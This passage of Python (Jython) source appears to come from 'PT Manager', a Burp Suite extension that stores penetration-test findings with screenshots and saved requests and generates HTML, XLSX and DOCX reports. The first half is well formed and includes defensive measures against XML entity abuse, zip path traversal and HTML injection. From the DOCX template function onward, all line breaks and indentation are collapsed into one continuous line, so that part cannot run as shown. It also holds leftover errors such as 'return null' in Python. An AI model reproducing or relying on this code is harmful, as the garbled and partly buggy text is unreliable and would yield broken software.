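        self.vulnName.setBounds(140, 10, 422, 30)

        severities = ["Unclassified", "Critical", "High", "Medium", "Low"]
        self.threatLevel = JComboBox(severities)
        self.threatLevel.setBounds(140, 45, 140, 30)

        colors = ["Color:", "Green", "Red"]
        self.colorCombo = JComboBox(colors)
        self.colorCombo.setBounds(465, 45, 100, 30)

        severityLabel = JLabel("Threat Level:")
        severityLabel.setBounds(10, 45, 100, 30)

        descriptionLabel = JLabel("Description:")
        descriptionLabel.setBounds(10, 80, 100, 30)

        self.descriptionString = JTextArea("", 5, 30)
        self.descriptionString.setWrapStyleWord(True)
        self.descriptionString.setLineWrap(True)
        self.descriptionString.setBounds(10, 110, 555, 175)
        descriptionStringScroll = JScrollPane(self.descriptionString)
        descriptionStringScroll.setBounds(10, 110, 555, 175)
        descriptionStringScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)

        self.mitigationStr = JTextArea("", 5, 30)
        self.mitigationStr.setWrapStyleWord(True)
        self.mitigationStr.setLineWrap(True)
        self.mitigationStr.setBounds(10, 320, 555, 175)
        mitigationStrScroll = JScrollPane(self.mitigationStr)
        mitigationStrScroll.setBounds(10, 320, 555, 175)
        mitigationStrScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)

        self.pnl = JPanel()
        self.pnl.setBounds(0, 0, 1000, 1000)
        self.pnl.setLayout(None)
        for component in (addSSBtn, piclistLabel, nameLabel, deleteSSBtn, rmVulnButton,
                          severityLabel, mitigationLabel, descriptionLabel, previewPicLabel,
                          mitigationStrScroll, descriptionStringScroll, self.ssList,
                          self.firstPic, self.addButton, self.vulnName, self.threatLevel,
                          self.colorCombo):
            self.pnl.add(component)

    def initProjSettingsTab(self):
        """Build the project settings panel (``self.projectSettings``) and preselect the default project."""
        projNameLabel = JLabel("Name:")
        projNameLabel.setBounds(10, 50, 140, 30)

        self.projName = JTextField("")
        self.projName.setBounds(140, 50, 320, 30)
        self.projName.getDocument().addDocumentListener(projTextChanged(self))

        detailsLabel = JLabel("Details:")
        detailsLabel.setBounds(10, 120, 140, 30)

        reportLabel = JLabel("Generate Report:")
        reportLabel.setBounds(10, 375, 140, 30)

        types = ["DOCX", "HTML", "XLSX"]
        self.reportType = JComboBox(types)
        self.reportType.setBounds(10, 400, 140, 30)

        generateReportButton = JButton("Generate", actionPerformed=self.generateReport)
        generateReportButton.setBounds(160, 400, 90, 30)

        self.projDetails = JTextArea("", 5, 30)
        self.projDetails.setWrapStyleWord(True)
        self.projDetails.setLineWrap(True)
        projDetailsScroll = JScrollPane(self.projDetails)
        projDetailsScroll.setBounds(10, 150, 450, 175)
        projDetailsScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)

        projPathLabel = JLabel("Path:")
        projPathLabel.setBounds(10, 90, 140, 30)

        self.projPath = JTextField("")
        self.projPath.setBounds(140, 90, 320, 30)

        chooseProjPathButton = JButton("Browse...", actionPerformed=self.chooseProjPath)
        chooseProjPathButton.setBounds(470, 90, 100, 30)

        importProjButton = JButton("Import", actionPerformed=self.importProj)
        importProjButton.setBounds(470, 10, 100, 30)

        exportProjButton = JButton("Export", actionPerformed=self.exportProj)
        exportProjButton.setBounds(575, 10, 100, 30)

        openProjButton = JButton("Open Directory", actionPerformed=self.openProj)
        openProjButton.setBounds(680, 10, 130, 30)

        currentProjectLabel = JLabel("Current:")
        currentProjectLabel.setBounds(10, 10, 140, 30)

        projects = self.config.options('projects')
        self.currentProject = JComboBox(projects)
        self.currentProject.addActionListener(projectChangeHandler(self))
        self.currentProject.setBounds(140, 10, 140, 30)

        self.autoSave = JCheckBox("Auto Save Mode")
        self.autoSave.setEnabled(False) # implement this feature
        self.autoSave.setBounds(300, 10, 140, 30)
        self.autoSave.setToolTipText("Will save any changed value while focus is out")

        addProjButton = JButton("Add / Update", actionPerformed=self.addProj)
        addProjButton.setBounds(10, 330, 150, 30)

        removeProjButton = JButton("Remove Current", actionPerformed=self.rmProj)
        removeProjButton.setBounds(315, 330, 146, 30)

        generalOptions = self.config.options('general')
        if 'default project' in generalOptions:
            defaultProj = self.config.get('general', 'default project')
            self.currentProject.getModel().setSelectedItem(defaultProj)
            self.projPath.setText(self.config.get('projects', self.currentProject.getSelectedItem()))

        self.clearProjTab = True
        self.projectSettings = JPanel()
        self.projectSettings.setBounds(0, 0, 1000, 1000)
        self.projectSettings.setLayout(None)
        for component in (reportLabel, detailsLabel, projPathLabel, addProjButton,
                          openProjButton, projNameLabel, projDetailsScroll, importProjButton,
                          exportProjButton, removeProjButton, generateReportButton,
                          chooseProjPathButton, currentProjectLabel, self.projPath,
                          self.autoSave, self.projName, self.reportType, self.currentProject):
            self.projectSettings.add(component)

    def initTabs(self):
        """Assemble the split pane: log table on the left, the four tabs on the right."""
        self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
        self.scrollPane = JScrollPane(self.logTable)
        self._splitpane.setLeftComponent(self.scrollPane)

        colorsMenu = JMenu("Paint")
        redMenu = JMenuItem("Red")
        noneMenu = JMenuItem("None")
        greenMenu = JMenuItem("Green")
        redMenu.addActionListener(paintChange(self, "Red"))
        noneMenu.addActionListener(paintChange(self, None))
        greenMenu.addActionListener(paintChange(self, "Green"))
        colorsMenu.add(redMenu)
        colorsMenu.add(noneMenu)
        colorsMenu.add(greenMenu)

        self.menu = JPopupMenu("Popup")
        self.menu.add(colorsMenu)

        self.tabs = JTabbedPane()
        self.tabs.addTab("Request", self._requestViewer.getComponent())
        self.tabs.addTab("Response", self._responseViewer.getComponent())
        self.tabs.addTab("Vulnerability", self.pnl)
        self.tabs.addTab("Project Settings", self.projectSettings)
        self.tabs.setSelectedIndex(2)
        self._splitpane.setRightComponent(self.tabs)

    def initCallbacks(self):
        """Register the UI components, the context menu factory and the suite tab with Burp."""
        # customize our UI components
        self._callbacks.customizeUiComponent(self._splitpane)
        self._callbacks.customizeUiComponent(self.logTable)
        self._callbacks.customizeUiComponent(self.scrollPane)
        self._callbacks.customizeUiComponent(self.tabs)
        self._callbacks.registerContextMenuFactory(self)
        # add the custom tab to Burp's UI
        self._callbacks.addSuiteTab(self)

    def loadVulnerabilities(self, projPath):
        """Reload the log table from the ``vulnerability.xml`` files under `projPath`.

        Directories whose XML cannot be loaded are skipped. The row whose name
        equals the current name field is selected; otherwise the first row is.
        """
        self.clearList(None)
        selected = False
        for root, dirs, files in os.walk(projPath): # make it go only for dirs
            for dirName in dirs:
                xmlPath = projPath + "/" + dirName + "/vulnerability.xml"
                document = self.getXMLDoc(xmlPath)
                if document is None:
                    # getXMLDoc already told the user; do not crash on the missing document.
                    continue
                nodeList = document.getDocumentElement().getChildNodes()
                vulnName = nodeList.item(0).getTextContent()
                severity = nodeList.item(1).getTextContent()
                description = nodeList.item(2).getTextContent()
                mitigation = nodeList.item(3).getTextContent()
                color = nodeList.item(4).getTextContent()
                test = vulnerability(vulnName, severity, description, mitigation, color)

                self._lock.acquire()
                try:
                    row = self._log.size()
                    self._log.add(test)
                    self.fireTableRowsInserted(row, row)
                finally:
                    # Always release, so a failing insert cannot block later updates.
                    self._lock.release()

                if vulnName == self.vulnName.getText():
                    self.logTable.setRowSelectionInterval(row, row)
                    selected = True

        if selected == False and self._log.size() > 0:
            self.logTable.setRowSelectionInterval(0, 0)
            self.loadVulnerability(self._log.get(0))

    def createSection(self, sectioName):
        """Make sure `sectioName` exists in config.ini, writing the file when it is added."""
        self.config.read('config.ini')
        if not (sectioName in self.config.sections()):
            self.config.add_section(sectioName)
            self.saveCfg()

    def saveCfg(self):
        """Write the in-memory configuration to config.ini."""
        with open('config.ini', 'w') as f:
            self.config.write(f)

    def getXMLDoc(self, xmlPath):
        """Parse `xmlPath` and return the DOM document, or None after a popup on failure.

        Project XML can arrive through an imported archive, so the parser is
        told to reject DOCTYPE declarations; that rules out external entities
        and entity expansion in files the tester did not write.
        """
        try:
            factory = DocumentBuilderFactory.newInstance()
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", True)
            return factory.newDocumentBuilder().parse(xmlPath)
        except:
            # The rest of this class reports through self.popup.
            self.popup("XML file not found")
            return

    def saveXMLDoc(self, doc, xmlPath):
        """Serialize the DOM document `doc` to the file `xmlPath`."""
        transformer = TransformerFactory.newInstance().newTransformer()
        transformer.transform(DOMSource(doc), StreamResult(File(xmlPath)))

    def generateReport(self, event):
        """Generate the selected report type and offer to open the result."""
        # Function-scope import keeps this method self-contained.
        from java.awt import Desktop

        path = None
        reportKind = self.reportType.getSelectedItem()
        if reportKind == "HTML":
            path = self.reportToHTML()
        if reportKind == "XLSX":
            path = self.reportToXLS()
        if reportKind == "DOCX":
            path = self.generateReportFromDocxTemplate('template.docx', "newfile.docx", 'word/document.xml')
        if path is None:
            # Nothing was generated (for example the XLSX writer is unavailable).
            return

        n = JOptionPane.showConfirmDialog(None, "Report generated successfuly:\n%s\nWould you like to open it?" % (path), "PT Manager", JOptionPane.YES_NO_OPTION)
        if n == JOptionPane.YES_OPTION:
            # Open through the desktop API instead of a shell command string: the
            # path is never parsed by a shell, and the call does not block Burp.
            Desktop.getDesktop().open(File(path))

    def exportProj(self, event):
        """Zip the current project directory to a file chosen by the user."""
        self.chooser.setDialogTitle("Save project")
        Ffilter = FileNameExtensionFilter("Zip files", ["zip"])
        self.chooser.setFileFilter(Ffilter)
        returnVal = self.chooser.showSaveDialog(None)
        if returnVal == JFileChooser.APPROVE_OPTION:
            dst = str(self.chooser.getSelectedFile())
            shutil.make_archive(dst, "zip", self.getCurrentProjPath())
            self.popup("Project export successfuly")

    def importProj(self, event):
        """Extract a project archive into ``<chosen dir>/PTManager`` and register it.

        The archive may come from someone else, so every member path is checked
        to stay inside the target directory before anything is extracted.
        """
        self.chooser.setDialogTitle("Select project zip to directory")
        Ffilter = FileNameExtensionFilter("Zip files", ["zip"])
        self.chooser.setFileFilter(Ffilter)
        returnVal = self.chooser.showOpenDialog(None)
        if returnVal != JFileChooser.APPROVE_OPTION:
            return
        zipPath = str(self.chooser.getSelectedFile())

        self.chooser.setDialogTitle("Select project directory")
        self.chooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY)
        returnVal = self.chooser.showOpenDialog(None)
        if returnVal != JFileChooser.APPROVE_OPTION:
            return
        projPath = str(self.chooser.getSelectedFile()) + "/PTManager"

        targetRoot = os.path.abspath(projPath)
        with zipfile.ZipFile(zipPath, "r") as z:
            for member in z.namelist():
                memberPath = os.path.abspath(os.path.join(targetRoot, member))
                if memberPath != targetRoot and not memberPath.startswith(targetRoot + os.sep):
                    self.popup("Project archive contains a path outside the project directory")
                    return
            z.extractall(projPath)

        xmlPath = projPath + "/project.xml"
        document = self.getXMLDoc(xmlPath)
        if document is None:
            return
        nodeList = document.getDocumentElement().getChildNodes()
        projName = nodeList.item(0).getTextContent()
        nodeList.item(1).setTextContent(projPath)
        self.saveXMLDoc(document, xmlPath)

        self.config.set('projects', projName, projPath)
        self.saveCfg()
        self.reloadProjects()
        self.currentProject.getModel().setSelectedItem(projName)
        self.clearVulnerabilityTab()

    def reportToXLS(self):
        """Write name, threat level, description and mitigation of every entry to an XLSX file.

        Returns the report path, or None when xlsxwriter is not available.
        """
        if not xlsxwriterImported:
            self.popup("xlsxwriter library is not imported")
            return
        reportPath = self.getCurrentProjPath() + '/PT Manager Report.xlsx'
        workbook = xlsxwriter.Workbook(reportPath)
        worksheet = workbook.add_worksheet()
        bold = workbook.add_format({'bold': True})
        worksheet.write(0, 0, "Vulnerability Name", bold)
        worksheet.write(0, 1, "Threat Level", bold)
        worksheet.write(0, 2, "Description", bold)
        worksheet.write(0, 3, "Mitigation", bold)
        for i in range(0, self._log.size()):
            entry = self._log.get(i)
            row = i + 1
            worksheet.write(row, 0, entry.getName())
            worksheet.write(row, 1, entry.getSeverity())
            worksheet.write(row, 2, entry.getDescription())
            worksheet.write(row, 3, entry.getMitigation())
            # add requests and images as well
        workbook.close()
        return reportPath

    def reportToHTML(self):
        """Write the HTML report for the current project and return its path.

        Saved requests and responses are content from the tested application,
        and names or descriptions may come from an imported project, so every
        value is HTML-escaped before it is placed in the page.
        """
        htmlContent = (
            '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> '
            '<html xmlns="http://www.w3.org/1999/xhtml" lang="he" dir="ltr"> '
            '<head> <title>PT Manager Report</title> '
            '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> '
            '<style> body { background-repeat: no-repeat; background-attachment: fixed; font-family: Arial,Tahoma,sens-serif; font-size: 13px; margin: auto; } '
            '#warpcenter { width: 900px; margin: 0px auto; } '
            'table { border: 2px dashed #000000; } '
            'td { border-top: 2px dashed #000000; padding: 10px; } '
            'img { border: 0px; } </style> '
            '<script language="javascript"> function divHideShow(divToHideOrShow) { var div = document.getElementById(divToHideOrShow); if (div.style.display == "block") { div.style.display = "none"; } else { div.style.display = "block"; } } </script> '
            '</head> <body> <div id="warpcenter"> <h1> PT Manager Report </h1> <h2> Project: %s</h1> '
        ) % (self.htmlEscape(self.projName.getText()))

        for i in range(0, self._log.size()):
            entry = self._log.get(i)
            name = entry.getName()
            request = "None"
            response = "None"
            path = self.getVulnReqResPath("request", name)
            if os.path.exists(path):
                request = self.newlineToBR(self.htmlEscape(self.getFileContent(path)))
            path = self.getVulnReqResPath("response", name)
            if os.path.exists(path):
                response = self.newlineToBR(self.htmlEscape(self.getFileContent(path)))

            images = ""
            vulnDir = self.projPath.getText() + "/" + self.clearStr(name)
            for fileName in os.listdir(vulnDir):
                if fileName.endswith(".jpg"):
                    images += "%s<br><img src=\"%s\"><br><br>" % (
                        self.htmlEscape(fileName), self.htmlEscape(vulnDir + "/" + fileName))

            description = self.newlineToBR(self.htmlEscape(entry.getDescription()))
            mitigation = self.newlineToBR(self.htmlEscape(entry.getMitigation()))
            htmlContent += self.convertVulntoTable(i, self.htmlEscape(name), self.htmlEscape(entry.getSeverity()), description, mitigation, request, response, images)

        htmlContent += "</div></body></html>"
        reportPath = self.getCurrentProjPath() + '/PT Manager Report.html'
        with open(reportPath, 'w') as f:
            f.write(htmlContent)
        return reportPath

    def newlineToBR(self, string):
        """Replace every newline in `string` with ``<br />``."""
        return "<br />".join(string.split("\n"))

    def getFileContent(self, path):
        """Return the raw content of the file at `path`."""
        with open(path, "rb") as f:
            return f.read()

    def convertVulntoTable(self, number, name, severity, description, mitigation, request = "None", response = "None", images = "None"):
        """Return the collapsible HTML block for one vulnerability.

        The values are inserted as given; callers are expected to pass text
        that is already HTML-escaped.
        """
        template = (
            '<div style="width: 100%%;height: 30px;text-align: center;background-color:#E0E0E0;font-size: 17px;font-weight: bold;color: #000;padding-top: 10px;">%s <a href="javascript:divHideShow(\'Table_%s\');" style="color:#191970">(OPEN / CLOSE)</a></div> '
            '<div id="Table_%s" style="display: none;"> '
            '<table width="100%%" cellspacing="0" cellpadding="0" style="margin: 0px auto;text-align: left;border-top: 0px;"> '
            '<tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Threat Level: </span> <span style="color:#8b8989">%s</span> </td> </tr> '
            '<tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Description</span> <a href="javascript:divHideShow(\'Table_%s_Command_03\');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_03" style="display: none;margin-top: 25px;"> %s </div> </td> </tr> '
            '<tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Mitigration</span> <a href="javascript:divHideShow(\'Table_%s_Command_04\');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_04" style="display: none;margin-top: 25px;"> %s <b> </td> </tr> '
            '<tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Request</span> <a href="javascript:divHideShow(\'Table_%s_Command_05\');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_05" style="display: none;margin-top: 25px;"> %s <b> </td> </tr> '
            '<tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Response</span> <a href="javascript:divHideShow(\'Table_%s_Command_06\');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_06" style="display: none;margin-top: 25px;"> %s <b> </td> </tr> '
            '<tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Images</span> <a href="javascript:divHideShow(\'Table_%s_Command_07\');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_07" style="display: none;margin-top: 25px;"> %s <b> </td> </tr> '
            '</table> </div><br><br>'
        )
        return template % (name, number, number, severity,
                           number, number, description,
                           number, number, mitigation,
                           number, number, request,
                           number, number, response,
                           number, number, images)

    def clearVulnerabilityTab(self, rmVuln=True):
        """Reset the vulnerability tab; the name field is cleared only when `rmVuln` is true."""
        # NOTE(review): assumes only the name reset is guarded by rmVuln - confirm against the original file.
        if rmVuln:
            self.vulnName.setText("")
        self.descriptionString.setText("")
        self.mitigationStr.setText("")
        self.colorCombo.setSelectedIndex(0)
        self.threatLevel.setSelectedIndex(0)
        self.screenshotsList.clear()
        self.addButton.setText("Add")
        self.firstPic.setIcon(None)

    def saveRequestResponse(self, type, requestResponse, vulnName):
        """Write the raw request or response bytes to the vulnerability's file for `type`."""
        path = self.getVulnReqResPath(type, vulnName)
        with open(path, 'wb') as f:
            f.write(requestResponse)

    def openProj(self, event):
        """Open the project directory in the platform file manager."""
        from java.awt import Desktop
        # The path is handed over as a File, not spliced into a shell command,
        # so spaces or shell metacharacters in it cannot change what is run.
        Desktop.getDesktop().open(File(self.projPath.getText()))

    def getVulnReqResPath(self, requestOrResponse, vulnName):
        """Return the path of the saved request or response file of a vulnerability."""
        cleanName = self.clearStr(vulnName)
        return self.getCurrentProjPath() + "/" + cleanName + "/" + requestOrResponse + "_" + cleanName

    def htmlEscape(self, data):
        """Escape &, <, >, double and single quotes for HTML text and quoted attributes."""
        # '&' goes first so the entities produced below are not escaped twice.
        return data.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;').replace('"', '&quot;').replace("'", '&#39;')

    def generateReportFromDocxTemplate(self,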
zipname, newZipName, filename): newZipName = self.getCurrentProjPath() + "/" + newZipName with zipfile.ZipFile(zipname, 'r') as zin: with zipfile.ZipFile(newZipName, 'w') as zout: zout.comment = zin.comment for item in zin.infolist(): if item.filename != filename: zout.writestr(item, zin.read(item.filename)) else: xml_content = zin.read(item.filename) result = re.findall("(.*)<w:body>(?:.*)<\/w:body>(.*)",xml_content)[0] newXML = result[0] templateBody = re.findall("<w:body>(.*)<\/w:body>", xml_content)[0] newBody = "" for i in range(0,self._log.size()): tmp = templateBody tmp = tmp.replace("$vulnerability", self.htmlEscape(self._log.get(i).getName())) tmp = tmp.replace("$severity", self.htmlEscape(self._log.get(i).getSeverity())) tmp = tmp.replace("$description", self.htmlEscape(self._log.get(i).getDescription())) tmp = tmp.replace("$mitigation", self.htmlEscape(self._log.get(i).getMitigation())) newBody = newBody + tmp newXML = newXML + newBody newXML = newXML + result[1] with zipfile.ZipFile(newZipName, mode='a', compression=zipfile.ZIP_DEFLATED) as zf: zf.writestr(filename, newXML) return newZipName def chooseProjPath(self, event): self.chooser.setDialogTitle("Select target directory") self.chooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY) returnVal = self.chooser.showOpenDialog(None) if returnVal == JFileChooser.APPROVE_OPTION: projPath = str(self.chooser.getSelectedFile()) + "/PTManager" os.makedirs(projPath) self.projPath.setText(projPath) def reloadProjects(self): self.currentProject.setModel(DefaultComboBoxModel(self.config.options('projects'))) def rmProj(self, event): if self.popUpAreYouSure() == JOptionPane.YES_OPTION: self._requestViewer.setMessage("None", False) self._responseViewer.setMessage("None", False) shutil.rmtree(self.projPath.getText()) self.config.remove_option('projects',self.currentProject.getSelectedItem()) self.reloadProjects() self.currentProject.setSelectedIndex(0) self.loadVulnerabilities(self.projPath.getText()) def 
popup(self,msg): JOptionPane.showMessageDialog(None,msg) def addProj(self, event): projPath = self.projPath.getText() if projPath == None or projPath == "": self.popup("Please select path") return self.config.set('projects', self.projName.getText(), projPath) self.saveCfg() xml = ET.Element('project') name = ET.SubElement(xml, "name") path = ET.SubElement(xml, "path") details = ET.SubElement(xml, "details") autoSaveMode = ET.SubElement(xml, "autoSaveMode") name.text = self.projName.getText() path.text = projPath details.text = self.projDetails.getText() autoSaveMode.text = str(self.autoSave.isSelected()) tree = ET.ElementTree(xml) try: tree.write(self.getCurrentProjPath()+'/project.xml') except: self.popup("Invalid path") return self.reloadProjects() self.clearVulnerabilityTab() self.clearList(None) self.currentProject.getModel().setSelectedItem(self.projName.getText()) def resize(self, image, width, height): bi = BufferedImage(width, height, BufferedImage.TRANSLUCENT) g2d = bi.createGraphics() g2d.addRenderingHints(RenderingHints(RenderingHints.KEY_RENDERING, RenderingHints.VALUE_RENDER_QUALITY)) g2d.drawImage(image, 0, 0, width, height, None) g2d.dispose() return bi; def clearStr(self, var): return var.replace(" " , "_").replace("\\" , "").replace("/" , "").replace(":" , "").replace("*" , "").replace("?" 
, "").replace("\"" , "").replace("<" , "").replace(">" , "").replace("|" , "").replace("(" , "").replace(")" , "") def popUpAreYouSure(self): dialogResult = JOptionPane.showConfirmDialog(None,"Are you sure?","Warning",JOptionPane.YES_NO_OPTION) if dialogResult == 0: return 0 return 1 def removeSS(self,event): if self.popUpAreYouSure() == JOptionPane.YES_OPTION: os.remove(self.getCurrentVulnPath() + "/" + self.ssList.getSelectedValue()) self.ssList.getModel().remove(self.ssList.getSelectedIndex()) self.firstPic.setIcon(ImageIcon(None)) # check if there is images and select the first one # bug in linux def addSS(self,event): clipboard = Toolkit.getDefaultToolkit().getSystemClipboard() try: image = clipboard.getData(DataFlavor.imageFlavor) except: self.popup("Clipboard not contains image") return vulnPath = self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText()) if not os.path.exists(vulnPath): os.makedirs(vulnPath) name = self.clearStr(self.vulnName.getText()) + str(random.randint(1, 99999))+".jpg" fileName = self.projPath.getText()+"/"+ self.clearStr(self.vulnName.getText()) + "/" + name file = File(fileName) bufferedImage = BufferedImage(image.getWidth(None), image.getHeight(None), BufferedImage.TYPE_INT_RGB); g = bufferedImage.createGraphics(); g.drawImage(image, 0, 0, bufferedImage.getWidth(), bufferedImage.getHeight(), Color.WHITE, None); ImageIO.write(bufferedImage, "jpg", file) self.addVuln(self) self.ssList.setSelectedValue(name,True) def rmVuln(self, event): if self.popUpAreYouSure() == JOptionPane.YES_OPTION: self._requestViewer.setMessage("None", False) self._responseViewer.setMessage("None", False) shutil.rmtree(self.getCurrentVulnPath()) self.clearVulnerabilityTab() self.loadVulnerabilities(self.getCurrentProjPath()) def addVuln(self, event): if self.colorCombo.getSelectedItem() == "Color:": colorTxt = None else: colorTxt = self.colorCombo.getSelectedItem() self._lock.acquire() row = self._log.size() vulnObject = 
vulnerability(self.vulnName.getText(),self.threatLevel.getSelectedItem(),self.descriptionString.getText(),self.mitigationStr.getText() ,colorTxt) self._log.add(vulnObject) self.fireTableRowsInserted(row, row) self._lock.release() vulnPath = self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText()) if not os.path.exists(vulnPath): os.makedirs(vulnPath) xml = ET.Element('vulnerability') name = ET.SubElement(xml, "name") severity = ET.SubElement(xml, "severity") description = ET.SubElement(xml, "description") mitigation = ET.SubElement(xml, "mitigation") color = ET.SubElement(xml, "color") name.text = self.vulnName.getText() severity.text = self.threatLevel.getSelectedItem() description.text = self.descriptionString.getText() mitigation.text = self.mitigationStr.getText() color.text = colorTxt tree = ET.ElementTree(xml) tree.write(vulnPath+'/vulnerability.xml') self.loadVulnerabilities(self.getCurrentProjPath()) self.loadVulnerability(vulnObject) def vulnNameChanged(self): if os.path.exists(self.getCurrentVulnPath()) and self.vulnName.getText() != "": self.addButton.setText("Update") elif self.addButton.getText() != "Add": options = ["Create a new vulnerability", "Change current vulnerability name"] n = JOptionPane.showOptionDialog(None, "Would you like to?", "Vulnerability Name", JOptionPane.YES_NO_CANCEL_OPTION, JOptionPane.QUESTION_MESSAGE, None, options, options[0]); if n == 0: self.clearVulnerabilityTab(False) self.addButton.setText("Add") else: newName = JOptionPane.showInputDialog( None, "Enter new name:", "Vulnerability Name", JOptionPane.PLAIN_MESSAGE, None, None, self.vulnName.getText()) row = self.logTable.getSelectedRow() old = self.logTable.getValueAt(row,1) self.changeVulnName(newName,old) def changeVulnName(self,new,old): newpath = self.getCurrentProjPath() + "/" + new oldpath = self.getCurrentProjPath() + "/" + old os.rename(oldpath,newpath) self.changeCurrentVuln(new,0, newpath + "/vulnerability.xml") def getCurrentVulnPath(self): return 
self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText()) def getCurrentProjPath(self): return self.projPath.getText() def loadSS(self, imgPath): image = ImageIO.read(File(imgPath)) if image.getWidth() <= 550 and image.getHeight() <= 400: self.firstPic.setIcon(ImageIcon(image)) self.firstPic.setSize(image.getWidth(),image.getHeight()) else: self.firstPic.setIcon(ImageIcon(self.resize(image,550, 400))) self.firstPic.setSize(550,400) def clearProjectTab(self): self.projPath.setText("") self.projDetails.setText("") def clearList(self, event): self._lock.acquire() self._log = ArrayList() row = self._log.size() self.fireTableRowsInserted(row, row) self._lock.release() # # implement IContextMenuFactory # def createMenuItems(self, invocation): responses = invocation.getSelectedMessages(); if responses > 0: ret = LinkedList() requestMenuItem = JMenuItem("Send to PT Manager"); requestMenuItem.addActionListener(handleMenuItems(self,responses[0], "request")) ret.add(requestMenuItem); return(ret); return null; # # implement ITab # def getTabCaption(self): return "PT Manager" def getUiComponent(self): return self._splitpane # # extend AbstractTableModel # def getRowCount(self): try: return self._log.size() except: return 0 def getColumnCount(self): return 3 def getColumnName(self, columnIndex): if columnIndex == 0: return "#" if columnIndex == 1: return "Vulnerability Name" if columnIndex == 2: return "Threat Level" return "" def getValueAt(self, rowIndex, columnIndex): vulnObject = self._log.get(rowIndex) if columnIndex == 0: return rowIndex+1 if columnIndex == 1: return vulnObject.getName() if columnIndex == 2: return vulnObject.getSeverity() if columnIndex == 3: return vulnObject.getMitigation() if columnIndex == 4: return vulnObject.getColor() return "" def changeCurrentVuln(self,value,fieldNumber, xmlPath = "def"): if xmlPath == "def": xmlPath = self.getCurrentVulnPath() + "/vulnerability.xml" document = self.getXMLDoc(xmlPath) nodeList = 
document.getDocumentElement().getChildNodes() nodeList.item(fieldNumber).setTextContent(value) self.saveXMLDoc(document, xmlPath) self.loadVulnerabilities(self.getCurrentProjPath()) def loadVulnerability(self, vulnObject): self.addButton.setText("Update") self.vulnName.setText(vulnObject.getName()) self.threatLevel.setSelectedItem(vulnObject.getSeverity()) self.descriptionString.setText(vulnObject.getDescription()) self.mitigationStr.setText(vulnObject.getMitigation()) if vulnObject.getColor() == "" or vulnObject.getColor() == None: self.colorCombo.setSelectedItem("Color:") else: self.colorCombo.setSelectedItem(vulnObject.getColor()) self.screenshotsList.clear() for fileName in os.listdir(self.projPath.getText()+"/"+self.clearStr(vulnObject.getName())): if fileName.endswith(".jpg"): self.screenshotsList.addElement(fileName) imgPath = self.projPath.getText()+"/"+self.clearStr(vulnObject.getName())+'/'+fileName # imgPath = imgPath.replace("/","//") self.loadSS(imgPath) if (self.screenshotsList.getSize() == 0): self.firstPic.setIcon(None) else: self.ssList.setSelectedIndex(0) path = self.getVulnReqResPath("request",vulnObject.getName()) if os.path.exists(path): f = self.getFileContent(path) self._requestViewer.setMessage(f, False) else: self._requestViewer.setMessage("None", False) path = self.getVulnReqResPath("response",vulnObject.getName()) if os.path.exists(path): f = self.getFileContent(path) self._responseViewer.setMessage(f, False) else: self._responseViewer.setMessage("None", False)